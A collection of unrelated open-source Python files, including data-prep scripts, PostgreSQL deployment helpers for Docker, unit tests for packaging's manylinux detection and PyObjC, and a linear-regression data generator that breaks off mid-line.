Chapter02/01_NASDAQ_TotalView-ITCH_Order_Book/create_message_spec.py | kksonge/Hands-On-Machine-Learning-for-Algorithmic-Trading | 944 | 12671143 | <filename>Chapter02/01_NASDAQ_TotalView-ITCH_Order_Book/create_message_spec.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = '<NAME>'
import pandas as pd
df = pd.read_excel('message_types.xlsx', sheet_name='messages', encoding='latin1').sort_values('id').drop('id', axis=1)
# basic cleaning
df.columns = [c.lower().strip() for c in df.columns]
df.value = df.value.str.strip()
df.name = df.name.str.strip().str.lower().str.replace(' ', '_').str.replace('-', '_').str.replace('/', '_')
df.notes = df.notes.str.strip()
df['message_type'] = df.loc[df.name == 'message_type', 'value']
messages = df.loc[:, ['message_type', 'notes']].dropna().rename(columns={'notes': 'name'})
messages.name = messages.name.str.lower().str.replace('message', '')
messages.name = messages.name.str.replace('.', '').str.strip().str.replace(' ', '_')
messages.to_csv('message_labels.csv', index=False)
df.message_type = df.message_type.ffill()
df = df[df.name != 'message_type']
df.value = df.value.str.lower().str.replace(' ', '_').str.replace('(', '').str.replace(')', '')
def check_field_count(df):
"""Helper that validates file format"""
message_size = pd.read_excel('message_types.xlsx', sheet_name='size', index_col=0)
message_size['check'] = df.groupby('message_type').size()
assert message_size['size'].equals(message_size.check), 'field count does not match template'
def check_field_specs():
messages = df.groupby('message_type')
for t, message in messages:
print(message.offset.add(message.length).shift().fillna(0).astype(int).equals(message.offset))
df[['message_type', 'name', 'value', 'length', 'offset', 'notes']].to_csv('message_types.csv', index=False)
|
mindspore_hub/info.py | mindspore-ai/hub | 153 | 12671161 | <filename>mindspore_hub/info.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
The information of network in mindspore_hub.
"""
from ._utils.check import ValidMarkdown
class CellInfo:
"""
Information of network.
"""
def __init__(self, md_path):
json_dict = ValidMarkdown(md_path).check_markdown_file()
self.name = json_dict.get('model-name')
self.backbone_name = json_dict.get('backbone-name')
self.type = json_dict.get('module-type')
self.fine_tunable = json_dict.get('fine-tunable')
self.input_shape = json_dict.get('input-shape')
self.author = json_dict.get('author')
self.update_time = json_dict.get('update-time')
self.repo_link = json_dict.get('repo-link')
self.user_id = json_dict.get('user-id')
self.backend = json_dict.get('backend')
if json_dict.get('allow-cache-ckpt') is not None:
self.allow_cache_ckpt = json_dict.get('allow-cache-ckpt')
self.dataset = json_dict.get('train-dataset')
self.license = json_dict.get('license')
self.accuracy = json_dict.get('accuracy')
self.used_for = json_dict.get('used-for')
self.model_version = json_dict.get('model-version')
self.mindspore_version = json_dict.get('mindspore-version')
self.asset = json_dict.get('asset')
self.asset_id = json_dict.get('asset-id')
|
Examples/Services/service_one/main.py | Mr-Victor/kivybits | 251 | 12671228 | <filename>Examples/Services/service_one/main.py
from time import sleep
from kivy.logger import Logger
import zipfile
from os.path import exists
class Waiter(object):
"""
This class simply waits for the update to finish and then closes.
"""
def __init__(self):
super(Waiter, self).__init__()
''' Hold a reference to the display wrapper class'''
self.counter = 0
def wait(self):
""" Start the loop where we wait for messages. """
while self.counter < 3:
Logger.info("service_one/main.py: counter = {0}".format(
self.counter))
sleep(.5)
self.counter += 1
Logger.info("service_one/main.py: count ended. About to open")
self.open_zip()
def open_zip(self):
""" Open a standard zip file. """
file_name = "service_one/main.zip"
if exists(file_name):
Logger.info("service_one/main.py: zip found. About to open.")
my_zip = zipfile.ZipFile(file_name, "r")
Logger.info("service_one/main.py: zip open. contains {0}".format(
my_zip.filelist))
Logger.info("service_one/main.py: zip examined. Exiting.")
else:
Logger.info("service_one/main.py: zip not found. Exiting.")
if __name__ == '__main__':
Waiter().wait()
|
dtale_desktop/file_system.py | dennislwm/dtale-desktop | 154 | 12671282 | import os
import shutil
from tempfile import mkdtemp
from typing import List, Callable, Tuple, Union
import pandas as pd
from typing_extensions import Literal
from dtale_desktop.settings import settings
__all__ = ["fs"]
_SENTINEL = object()
_TimeStampFormat = Literal["pandas", "unix_seconds", "unix_milliseconds"]
class _FileSystem:
ROOT_DIR: str
LOADERS_DIR: str
ADDITIONAL_LOADERS_DIRS: List[str]
CACHE_DIR: str
DATA_DIR: str
PROFILE_REPORTS_DIR: str
_instance = _SENTINEL
def __init__(self):
if self._instance is not _SENTINEL:
raise Exception("_Files is a singleton")
self._instance = self
self.ROOT_DIR = settings.ROOT_DIR
self.LOADERS_DIR = os.path.join(self.ROOT_DIR, "loaders")
self.ADDITIONAL_LOADERS_DIRS = settings.ADDITIONAL_LOADERS_DIRS
self.CACHE_DIR = os.path.join(self.ROOT_DIR, "cache")
self.DATA_DIR = os.path.join(self.CACHE_DIR, "data")
self.PROFILE_REPORTS_DIR = os.path.join(self.CACHE_DIR, "profile_reports")
self.create_directory(self.ROOT_DIR)
self.create_directory(self.CACHE_DIR)
self.create_directory(self.DATA_DIR)
self.create_directory(self.PROFILE_REPORTS_DIR)
self.create_python_package(self.LOADERS_DIR)
def create_directory(self, path: str) -> None:
os.makedirs(path, exist_ok=True)
def create_file(self, path: str, contents: str = "") -> None:
file = open(path, "w")
file.write(contents)
file.close()
def delete_file(self, path: str) -> None:
if os.path.exists(path):
os.remove(path)
def get_file_last_modified(
self, path: str, format: _TimeStampFormat = "pandas",
) -> Union[int, pd.Timestamp]:
ts = os.path.getmtime(path)
if format == "pandas":
return pd.Timestamp.fromtimestamp(ts)
elif format == "unix_seconds":
return int(ts)
else:
return int(ts) * 1000
@staticmethod
def _format_data_file_name(name: str):
return name if name.endswith(".pkl") else f"{name}.pkl"
def data_path(self, data_id: str) -> str:
return os.path.join(self.DATA_DIR, self._format_data_file_name(data_id))
def save_data(self, data_id: str, data: pd.DataFrame) -> None:
data.to_pickle(self.data_path(data_id))
def data_exists(self, data_id: str) -> bool:
return os.path.exists(self.data_path(data_id))
def read_data(self, data_id: str) -> pd.DataFrame:
return pd.read_pickle(self.data_path(data_id))
def delete_data(self, data_id: str) -> None:
self.delete_file(self.data_path(data_id))
@staticmethod
def _format_profile_report_name(name: str):
return name if name.endswith(".html") else f"{name}.html"
def profile_report_path(self, data_id: str):
return os.path.join(
self.PROFILE_REPORTS_DIR, self._format_profile_report_name(data_id)
)
def profile_report_exists(self, data_id: str) -> bool:
return os.path.exists(self.profile_report_path(data_id))
def read_profile_report(self, data_id: str) -> str:
with open(self.profile_report_path(data_id), encoding="utf-8") as f:
return f.read()
def delete_profile_report(self, data_id: str) -> None:
self.delete_file(self.profile_report_path(data_id))
def delete_all_cached_data(self, data_id: str) -> None:
self.delete_data(data_id)
self.delete_profile_report(data_id)
def create_temp_directory(
self, folder_name: str = "temp"
) -> Tuple[str, Callable[[], None]]:
temp_dir = os.path.join(mkdtemp(), folder_name)
return temp_dir, lambda: shutil.rmtree(temp_dir)
def create_python_package(self, path: str) -> None:
if not os.path.exists(path):
self.create_directory(path)
init_file = os.path.join(path, "__init__.py")
if not os.path.exists(init_file):
self.create_file(init_file)
fs = _FileSystem()
|
tests/tests_models/test_activation_fn.py | TomF98/torchphysics | 203 | 12671292 | <filename>tests/tests_models/test_activation_fn.py
import pytest
import torch
from torchphysics.models.activation_fn import AdaptiveActivationFunction
def test_create_adaptive_with_tanh():
adap_fn = AdaptiveActivationFunction(torch.nn.Tanh())
assert isinstance(adap_fn.activation_fn, torch.nn.Tanh)
assert adap_fn.a == 1.0
assert adap_fn.scaling == 1.0
def test_create_adaptive_with_ReLu():
adap_fn = AdaptiveActivationFunction(torch.nn.ReLU(), inital_a=5.0, scaling=10.0)
assert isinstance(adap_fn.activation_fn, torch.nn.ReLU)
assert adap_fn.a == 5.0
assert adap_fn.a.requires_grad
assert adap_fn.scaling == 10.0
def test_forward_of_adaptive_activation():
input_x = torch.tensor([[1.0], [2.0], [-5.0]])
adap_fn = AdaptiveActivationFunction(torch.nn.ReLU(), inital_a=5.0, scaling=10.0)
output_x = adap_fn(input_x)
assert len(output_x) == 3
assert output_x[0] == 50.0
assert output_x[1] == 100.0
assert output_x[2] == 0.0
|
fabricio/apps/db/postgres.py | theoden-dd/fabricio | 291 | 12671308 | <gh_stars>100-1000
import multiprocessing
import os
from datetime import datetime
import six
from fabric import api as fab
from fabric.contrib import files
import fabricio
from fabricio import docker, utils
from fabricio.docker.base import Attribute
from fabricio.utils import Options
class PostgresqlBackupMixin(docker.BaseService):
"""
Your Docker image must have pg_dump and pg_restore installed in order
to run backup and restore respectively
(usually this requires `postgresql-client-common` package for Ubuntu/Debian)
"""
db_name = Attribute()
db_user = Attribute(default='postgres')
db_host = Attribute()
db_port = Attribute()
db_backup_dir = Attribute()
db_backup_format = Attribute(default='c')
db_backup_compress_level = Attribute() # 0-9 (0 - no compression, 9 - max)
db_backup_workers = Attribute(default=1)
db_restore_workers = Attribute(default=4)
db_backup_filename = Attribute(default='{datetime:%Y-%m-%dT%H:%M:%S.%f}.dump')
@property
def db_connection_options(self):
return Options([
('username', self.db_user),
('host', self.db_host),
('port', self.db_port),
])
@property
def db_backup_options(self):
return Options([
('if-exists', True),
('create', True),
('clean', True),
])
def make_backup_command(self):
options = Options(self.db_connection_options)
options.update(self.db_backup_options)
options.update([
('format', self.db_backup_format),
('dbname', self.db_name),
('compress', self.db_backup_compress_level),
('jobs', self.db_backup_workers),
('file', os.path.join(
self.db_backup_dir,
self.db_backup_filename.format(datetime=datetime.utcnow())
)),
])
return 'pg_dump {options}'.format(options=options)
@fabricio.once_per_task
def backup(self):
if self.db_backup_dir is None:
fab.abort('db_backup_dir not set, can\'t continue with backup')
command = self.make_backup_command()
self.image.run(
command=command,
quiet=False,
options=self.safe_options,
)
@property
def db_restore_options(self):
return self.db_backup_options
def make_restore_command(self, backup_filename):
options = Options(self.db_connection_options)
options.update(self.db_restore_options)
options.update([
('dbname', 'template1'), # use any existing DB
('jobs', self.db_restore_workers),
('file', os.path.join(self.db_backup_dir, backup_filename)),
])
return 'pg_restore {options}'.format(options=options)
@fabricio.once_per_task
def restore(self, backup_name=None):
"""
Before run this method you have somehow to disable incoming connections,
e.g. by stopping all database client containers:
client_container.stop()
pg_container.restore()
client_container.start()
"""
if self.db_backup_dir is None:
fab.abort('db_backup_dir not set, can\'t continue with restore')
if backup_name is None:
raise ValueError('backup_filename not provided')
command = self.make_restore_command(backup_name)
self.image.run(
command=command,
quiet=False,
options=self.safe_options,
)
class PostgresqlContainer(docker.Container):
pg_conf = Attribute(default='postgresql.conf')
pg_hba = Attribute(default='pg_hba.conf')
pg_data = Attribute(default=NotImplemented)
sudo = Attribute(default=False)
stop_signal = 'INT'
stop_timeout = 30
def update_config(self, content, path):
old_file = six.BytesIO()
if files.exists(path, use_sudo=self.sudo):
fab.get(remote_path=path, local_path=old_file, use_sudo=self.sudo)
old_content = old_file.getvalue()
need_update = content != old_content
if need_update:
fabricio.move_file(
path_from=path,
path_to=path + '.backup',
sudo=self.sudo,
ignore_errors=True,
)
fab.put(six.BytesIO(content), path, use_sudo=self.sudo, mode='0644')
fabricio.log('{path} updated'.format(path=path))
else:
fabricio.log('{path} not changed'.format(path=path))
return need_update
def db_exists(self):
return files.exists(
os.path.join(self.pg_data, 'PG_VERSION'),
use_sudo=self.sudo,
)
def create_db(self, tag=None, registry=None, account=None):
"""
Official PostgreSQL Docker image executes 'postgres initdb' before
any command starting with 'postgres' (see /docker-entrypoint.sh),
therefore if you use custom image, you probably have to implement
your own `create_db()`
"""
fabricio.log('PostgreSQL database not found, creating new...')
self.image[registry:tag:account].run(
'postgres --version', # create new DB (see method description)
options=self.safe_options,
quiet=False,
)
def update(self, tag=None, registry=None, account=None, force=False):
if not any(map(self.options.__contains__, ['volume', 'mount'])):
# TODO better check if volume or mount properly defined
fab.abort(
'Make sure you properly define volume or mount for DB data, '
'Fabricio cannot work properly without it'
)
if not self.db_exists():
self.create_db(tag=tag, registry=registry, account=account)
main_conf = os.path.join(self.pg_data, 'postgresql.conf')
hba_conf = os.path.join(self.pg_data, 'pg_hba.conf')
main_config_updated = self.update_config(
content=open(self.pg_conf, 'rb').read(),
path=main_conf,
)
hba_config_updated = self.update_config(
content=open(self.pg_hba, 'rb').read(),
path=hba_conf,
)
container_updated = super(PostgresqlContainer, self).update(
force=force,
tag=tag,
registry=registry,
account=account,
)
if not container_updated:
if main_config_updated:
self.reload()
elif hba_config_updated:
self.signal('HUP')
else:
return False # nothing updated
try:
# remove container backup to prevent reverting to old version
self.get_backup_version().delete(delete_image=True)
except docker.ContainerNotFoundError:
pass
if not main_config_updated:
# remove main config backup to prevent reverting to old version
main_conf_backup = main_conf + '.backup'
fabricio.remove_file(
main_conf_backup,
ignore_errors=True,
sudo=self.sudo,
)
if not hba_config_updated:
# remove pg_hba config backup to prevent reverting to old version
hba_conf_backup = hba_conf + '.backup'
fabricio.remove_file(
hba_conf_backup,
ignore_errors=True,
sudo=self.sudo,
)
return True
def revert(self):
main_conf = os.path.join(self.pg_data, 'postgresql.conf')
main_conf_backup = main_conf + '.backup'
hba_conf = os.path.join(self.pg_data, 'pg_hba.conf')
hba_conf_backup = hba_conf + '.backup'
main_config_reverted = fabricio.move_file(
path_from=main_conf_backup,
path_to=main_conf,
ignore_errors=True,
sudo=self.sudo,
).succeeded
hba_config_reverted = fabricio.move_file(
path_from=hba_conf_backup,
path_to=hba_conf,
ignore_errors=True,
sudo=self.sudo,
).succeeded
try:
super(PostgresqlContainer, self).revert()
except docker.ContainerError:
if main_config_reverted:
self.reload()
elif hba_config_reverted:
self.signal('HUP')
else:
raise
def destroy(self, delete_data=False):
super(PostgresqlContainer, self).destroy()
if utils.strtobool(delete_data):
fabricio.remove_file(
self.pg_data,
sudo=self.sudo,
force=True,
recursive=True,
)
class StreamingReplicatedPostgresqlContainer(PostgresqlContainer):
pg_recovery = Attribute(default='recovery.conf')
pg_recovery_primary_conninfo = Attribute(
default="primary_conninfo = 'host={host} port={port} user={user}'"
) # type: str
pg_recovery_port = Attribute(default=5432)
pg_recovery_user = Attribute(default='postgres')
pg_recovery_revert_enabled = Attribute(default=False)
pg_recovery_master_promotion_enabled = Attribute(default=False)
pg_recovery_wait_for_master_seconds = Attribute(default=30)
def __init__(self, *args, **kwargs):
super(StreamingReplicatedPostgresqlContainer, self).__init__(
*args, **kwargs)
self.master_obtained = multiprocessing.Event()
self.master_lock = multiprocessing.Lock()
self.multiprocessing_data = data = multiprocessing.Manager().Namespace()
data.db_exists = False
data.exception = None
self.instances = multiprocessing.JoinableQueue()
def copy_data_from_master(self, tag=None, registry=None, account=None):
pg_basebackup_command = (
'pg_basebackup'
' --progress'
' --write-recovery-conf'
' -X stream'
' --pgdata=$PGDATA'
' --host={host}'
' --username={user}'
' --port={port}'
''.format(
host=self.multiprocessing_data.master,
user=self.pg_recovery_user,
port=self.pg_recovery_port,
)
)
command = "/bin/bash -c '{pg_basebackup_command}'".format(
pg_basebackup_command=pg_basebackup_command,
)
self.image[registry:tag:account].run(
command=command,
options=self.options,
quiet=False,
)
def get_recovery_config(self):
recovery_config = open(self.pg_recovery).read()
primary_conninfo = self.pg_recovery_primary_conninfo.format(
host=self.multiprocessing_data.master,
port=self.pg_recovery_port,
user=self.pg_recovery_user,
)
recovery_config_items = [
row for row in recovery_config.splitlines()
if not row.startswith('primary_conninfo')
]
recovery_config_items.append(primary_conninfo)
return ('\n'.join(recovery_config_items) + '\n').encode()
def set_master_info(self):
if self.multiprocessing_data.exception is not None:
fab.abort('Task aborted due an exception: {exception}'.format(
exception=self.multiprocessing_data.exception,
))
fabricio.log('Found master: {host}'.format(host=fab.env.host))
self.multiprocessing_data.master = fab.env.host
def update_recovery_config(self, tag=None, registry=None, account=None):
db_exists = self.db_exists()
recovery_conf_file = os.path.join(self.pg_data, 'recovery.conf')
if db_exists:
self.multiprocessing_data.db_exists = True
if not files.exists(recovery_conf_file, use_sudo=self.sudo):
# master founded
self.set_master_info()
return False
fabricio.log('Waiting for master info ({seconds} seconds)...'.format(
seconds=self.pg_recovery_wait_for_master_seconds,
))
self.master_obtained.wait(self.pg_recovery_wait_for_master_seconds)
if not self.master_obtained.is_set():
if db_exists and not self.pg_recovery_master_promotion_enabled:
fab.abort(
'Database exists but master not found. This probably '
'means master failure. New master promotion disabled '
'by default, but can be enabled by setting attribute '
'\'pg_recovery_master_promotion_enabled\' to True.'
)
self.master_lock.acquire()
if not self.master_obtained.is_set():
if db_exists:
fabricio.move_file(
path_from=recovery_conf_file,
path_to=recovery_conf_file + '.backup',
sudo=self.sudo,
)
self.set_master_info()
return True
elif not self.multiprocessing_data.db_exists:
self.set_master_info()
return False
self.master_lock.release()
self.master_obtained.wait()
if not db_exists:
self.copy_data_from_master(
tag=tag,
registry=registry,
account=account,
)
return self.update_config(
content=self.get_recovery_config(),
path=os.path.join(self.pg_data, 'recovery.conf'),
)
def update(self, tag=None, registry=None, account=None, force=False):
if not fab.env.parallel:
fab.abort(
'Master-slave configuration update requires parallel mode. '
'Use Fabric\'s `--parallel` option to enable this mode '
'for a current session.'
)
self.instances.put(None)
try:
recovery_config_updated = self.update_recovery_config(
tag=tag,
registry=registry,
account=account,
)
container_updated = super(
StreamingReplicatedPostgresqlContainer,
self,
).update(force=force, tag=tag, registry=registry, account=account)
if not container_updated and recovery_config_updated:
self.reload()
self.master_obtained.set() # one who first comes here is master
return container_updated or recovery_config_updated
except Exception as exception:
self.multiprocessing_data.exception = exception
raise
finally:
try:
self.master_lock.release()
except ValueError: # ignore "released too many times" error
pass
self.instances.get()
self.instances.task_done()
self.instances.join() # wait until all instances will be updated
# reset state at the end to prevent fail of the next Fabric command
self.master_obtained.clear()
def revert(self):
if not self.pg_recovery_revert_enabled:
fab.abort(
"StreamingReplicatedPostgresqlContainer can not be reverted by "
"default. You can change this behaviour by setting attribute "
"'pg_recovery_revert_enabled'. BUT whether this attribute is "
"set or not, recovery configs (master-slave configuration) "
"will not be reverted anyway."
)
super(StreamingReplicatedPostgresqlContainer, self).revert()
|
remme/tp/context.py | FerrySchuller/remme-core | 129 | 12671330 | import logging
from google.protobuf.text_format import ParseError
from sawtooth_sdk.processor.exceptions import InternalError
from sawtooth_sdk.protobuf import state_context_pb2
from remme.settings import STATE_TIMEOUT_SEC
logger = logging.getLogger(__name__)
class CacheContextService:
def __init__(self, context):
self._storage = {}
self._context = context
def preload_state(self, addresses):
addresses = list(filter(lambda a: len(a) == 70, addresses))
entries = self.get_state(addresses)
for i, entry in enumerate(entries):
self._storage[entry.address] = entry.data
logger.debug(f'Stored data for addresses: {self._storage}')
def get_cached_data(self, resolvers, timeout=STATE_TIMEOUT_SEC):
for address, pb_class in resolvers:
try:
data = self._storage[address]
logger.debug('Got loaded data for address '
f'"{address}": {data}')
except KeyError:
try:
data = self.get_state([address])[0].data
self._storage[address] = data
logger.debug('Got pre-loaded data for address '
f'"{address}": {data}')
except IndexError:
yield None
continue
except Exception as e:
logger.exception(e)
raise InternalError(f'Address "{address}" does not '
'have access to data')
if data is None:
yield data
continue
try:
pb = pb_class()
pb.ParseFromString(data)
yield pb
except ParseError:
raise InternalError('Failed to deserialize data')
except Exception as e:
logger.exception(e)
yield None
def get_state(self, addresses, timeout=STATE_TIMEOUT_SEC):
return self._context.get_state(addresses, timeout)
def set_state(self, entries, timeout=STATE_TIMEOUT_SEC):
return self._context.set_state(entries, timeout)
def delete_state(self, addresses, timeout=STATE_TIMEOUT_SEC):
return self._context.delete_state(addresses, timeout)
def add_receipt_data(self, data, timeout=STATE_TIMEOUT_SEC):
return self._context.add_receipt_data(data, timeout)
def add_event(self, event_type, attributes=None, data=None,
timeout=STATE_TIMEOUT_SEC):
return self._context.add_event(event_type, attributes, data, timeout)
|
TWE-1/train.py | sysuhu/topical_word_embeddings | 330 | 12671349 | <reponame>sysuhu/topical_word_embeddings
#!/usr/bin/env python2
#-*- coding: UTF-8 -*-
#File: train.py
#Date: 20140810
#Author: <NAME> <<EMAIL>>
#Description Train the topic representation using the topic model and the word2vec's skip gram
import gensim #modified gensim version
import pre_process # read the wordmap and the tassgin file and create the sentence
import sys
if __name__=="__main__":
if len(sys.argv)!=4:
print "Usage : python train.py wordmap tassign topic_number"
sys.exit(1)
reload(sys)
sys.setdefaultencoding('utf-8')
wordmapfile = sys.argv[1]
tassignfile = sys.argv[2]
topic_number = int(sys.argv[3])
id2word = pre_process.load_id2word(wordmapfile)
pre_process.load_sentences(tassignfile, id2word)
sentence_word = gensim.models.word2vec.LineSentence("tmp/word.file")
print "Training the word vector..."
w = gensim.models.Word2Vec(sentence_word,size=400, workers=20)
sentence = gensim.models.word2vec.CombinedSentence("tmp/word.file","tmp/topic.file")
print "Training the topic vector..."
w.train_topic(topic_number, sentence)
print "Saving the topic vectors..."
w.save_topic("output/topic_vector.txt")
print "Saving the word vectors..."
w.save_wordvector("output/word_vector.txt")
|
tests/test_manylinux.py | hugovk/packaging | 388 | 12671442 | <reponame>hugovk/packaging
try:
import ctypes
except ImportError:
ctypes = None
import os
import platform
import sys
import types
import warnings
import pretend
import pytest
from packaging import _manylinux
from packaging._manylinux import (
_ELFFileHeader,
_get_elf_header,
_get_glibc_version,
_glibc_version_string,
_glibc_version_string_confstr,
_glibc_version_string_ctypes,
_is_compatible,
_is_linux_armhf,
_is_linux_i686,
_parse_glibc_version,
)
@pytest.fixture(autouse=True)
def clear_lru_cache():
yield
_get_glibc_version.cache_clear()
@pytest.fixture
def manylinux_module(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_glibc_version", lambda *args: (2, 20))
module_name = "_manylinux"
module = types.ModuleType(module_name)
monkeypatch.setitem(sys.modules, module_name, module)
return module
@pytest.mark.parametrize("tf", (True, False))
@pytest.mark.parametrize(
"attribute,glibc", (("1", (2, 5)), ("2010", (2, 12)), ("2014", (2, 17)))
)
def test_module_declaration(monkeypatch, manylinux_module, attribute, glibc, tf):
manylinux = f"manylinux{attribute}_compatible"
monkeypatch.setattr(manylinux_module, manylinux, tf, raising=False)
res = _is_compatible(manylinux, "x86_64", glibc)
assert tf is res
@pytest.mark.parametrize(
"attribute,glibc", (("1", (2, 5)), ("2010", (2, 12)), ("2014", (2, 17)))
)
def test_module_declaration_missing_attribute(
monkeypatch, manylinux_module, attribute, glibc
):
manylinux = f"manylinux{attribute}_compatible"
monkeypatch.delattr(manylinux_module, manylinux, raising=False)
assert _is_compatible(manylinux, "x86_64", glibc)
@pytest.mark.parametrize(
"version,compatible", (((2, 0), True), ((2, 5), True), ((2, 10), False))
)
def test_is_manylinux_compatible_glibc_support(version, compatible, monkeypatch):
monkeypatch.setitem(sys.modules, "_manylinux", None)
monkeypatch.setattr(_manylinux, "_get_glibc_version", lambda: (2, 5))
assert bool(_is_compatible("manylinux1", "any", version)) == compatible
@pytest.mark.parametrize("version_str", ["glibc-2.4.5", "2"])
def test_check_glibc_version_warning(version_str):
with warnings.catch_warnings(record=True) as w:
_parse_glibc_version(version_str)
assert len(w) == 1
assert issubclass(w[0].category, RuntimeWarning)
@pytest.mark.skipif(not ctypes, reason="requires ctypes")
@pytest.mark.parametrize(
"version_str,expected",
[
# Be very explicit about bytes and Unicode for Python 2 testing.
(b"2.4", "2.4"),
("2.4", "2.4"),
],
)
def test_glibc_version_string(version_str, expected, monkeypatch):
class LibcVersion:
def __init__(self, version_str):
self.version_str = version_str
def __call__(self):
return version_str
class ProcessNamespace:
def __init__(self, libc_version):
self.gnu_get_libc_version = libc_version
process_namespace = ProcessNamespace(LibcVersion(version_str))
monkeypatch.setattr(ctypes, "CDLL", lambda _: process_namespace)
monkeypatch.setattr(_manylinux, "_glibc_version_string_confstr", lambda: False)
assert _glibc_version_string() == expected
del process_namespace.gnu_get_libc_version
assert _glibc_version_string() is None
def test_glibc_version_string_confstr(monkeypatch):
monkeypatch.setattr(os, "confstr", lambda x: "glibc 2.20", raising=False)
assert _glibc_version_string_confstr() == "2.20"
def test_glibc_version_string_fail(monkeypatch):
monkeypatch.setattr(os, "confstr", lambda x: None, raising=False)
monkeypatch.setitem(sys.modules, "ctypes", None)
assert _glibc_version_string() is None
assert _get_glibc_version() == (-1, -1)
@pytest.mark.parametrize(
"failure",
[pretend.raiser(ValueError), pretend.raiser(OSError), lambda x: "XXX"],
)
def test_glibc_version_string_confstr_fail(monkeypatch, failure):
monkeypatch.setattr(os, "confstr", failure, raising=False)
assert _glibc_version_string_confstr() is None
def test_glibc_version_string_confstr_missing(monkeypatch):
monkeypatch.delattr(os, "confstr", raising=False)
assert _glibc_version_string_confstr() is None
def test_glibc_version_string_ctypes_missing(monkeypatch):
monkeypatch.setitem(sys.modules, "ctypes", None)
assert _glibc_version_string_ctypes() is None
def test_glibc_version_string_ctypes_raise_oserror(monkeypatch):
def patched_cdll(name):
raise OSError("Dynamic loading not supported")
monkeypatch.setattr(ctypes, "CDLL", patched_cdll)
assert _glibc_version_string_ctypes() is None
@pytest.mark.skipif(platform.system() != "Linux", reason="requires Linux")
def test_is_manylinux_compatible_old():
# Assuming no one is running this test with a version of glibc released in
# 1997.
assert _is_compatible("any", "any", (2, 0))
def test_is_manylinux_compatible(monkeypatch):
monkeypatch.setattr(_manylinux, "_glibc_version_string", lambda: "2.4")
assert _is_compatible("", "any", (2, 4))
def test_glibc_version_string_none(monkeypatch):
monkeypatch.setattr(_manylinux, "_glibc_version_string", lambda: None)
assert not _is_compatible("any", "any", (2, 4))
def test_is_linux_armhf_not_elf(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_elf_header", lambda: None)
assert not _is_linux_armhf()
def test_is_linux_i686_not_elf(monkeypatch):
monkeypatch.setattr(_manylinux, "_get_elf_header", lambda: None)
assert not _is_linux_i686()
@pytest.mark.parametrize(
"machine, abi, elf_class, elf_data, elf_machine",
[
(
"x86_64",
"x32",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_X86_64,
),
(
"x86_64",
"i386",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_386,
),
(
"x86_64",
"amd64",
_ELFFileHeader.ELFCLASS64,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_X86_64,
),
(
"armv7l",
"armel",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_ARM,
),
(
"armv7l",
"armhf",
_ELFFileHeader.ELFCLASS32,
_ELFFileHeader.ELFDATA2LSB,
_ELFFileHeader.EM_ARM,
),
(
"s390x",
"s390x",
_ELFFileHeader.ELFCLASS64,
_ELFFileHeader.ELFDATA2MSB,
_ELFFileHeader.EM_S390,
),
],
)
def test_get_elf_header(monkeypatch, machine, abi, elf_class, elf_data, elf_machine):
path = os.path.join(
os.path.dirname(__file__),
"manylinux",
f"hello-world-{machine}-{abi}",
)
monkeypatch.setattr(sys, "executable", path)
elf_header = _get_elf_header()
assert elf_header.e_ident_class == elf_class
assert elf_header.e_ident_data == elf_data
assert elf_header.e_machine == elf_machine
@pytest.mark.parametrize(
"content", [None, "invalid-magic", "invalid-class", "invalid-data", "too-short"]
)
def test_get_elf_header_bad_executable(monkeypatch, content):
if content:
path = os.path.join(
os.path.dirname(__file__),
"manylinux",
f"hello-world-{content}",
)
else:
path = None
monkeypatch.setattr(sys, "executable", path)
assert _get_elf_header() is None
|
tests/config/test_cfg_alt.py | ThePrez/gunicorn | 6,851 | 12671501 | proc_name = "not-fooey"
|
mac/pyobjc-framework-Quartz/PyObjCTest/test_ciimage.py | albertz/music-player | 132 | 12671519 |
from PyObjCTools.TestSupport import *
from Quartz.QuartzCore import *
try:
long
except NameError:
long = int
try:
unicode
except NameError:
unicode = str
class TestCIImage (TestCase):
def testConstants(self):
self.assertIsInstance(kCIFormatARGB8, (int, long))
self.assertIsInstance(kCIFormatRGBA16, (int, long))
self.assertIsInstance(kCIFormatRGBAf, (int, long))
self.assertIsInstance(kCIImageColorSpace, unicode)
def testMethods(self):
self.assertArgIsBOOL(CIImage.imageWithTexture_size_flipped_colorSpace_, 2)
self.assertArgIsBOOL(CIImage.initWithTexture_size_flipped_colorSpace_, 2)
if __name__ == "__main__":
main()
|
ch04_linear/code/generate_data.py | wellszhao/intro_ds_wy_course | 146 | 12671523 | <gh_stars>100-1000
# -*- coding: UTF-8 -*-
"""
此脚本用于随机生成线性回归模型的训练数据
"""
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def generate_data():
"""
随机生成数据
"""
# 规定随机数生成的种子
np.random.seed(4889)
# Python2和Python3的range并不兼容,所以使用list(range(10, 29))
x = np.array([10] + list(range(10, 29)))
error = np.round(np.random.randn(20), 2)
y = x + error
return pd.DataFrame({"x": x, "y": y})
def visualize_data(data):
"""
数据可视化
"""
# 创建一个图形框,在里面只画一幅图
fig = plt.figure(figsize=(6, 6), dpi=80)
ax = fig.add_subplot(111)
# 设置坐标轴
ax.set_xlabel("$x$")
ax.set_xticks(range(10, 31, 5))
ax.set_ylabel("$y$")
ax.set_yticks(range(10, 31, 5))
# 画点图,点的颜色为蓝色
ax.scatter(data.x, data.y, color="b",
label="$y = x + \epsilon$")
plt.legend(shadow=True)
# 展示上面所画的图片。图片将阻断程序的运行,直至所有的图片被关闭
# 在Python shell里面,可以设置参数"block=False",使阻断失效。
plt.show()
if __name__ == "__main__":
data = generate_data()
home_path = os.path.dirname(os.path.abspath(__file__))
# 存储数据,Windows下的存储路径与Linux并不相同
if os.name == "nt":
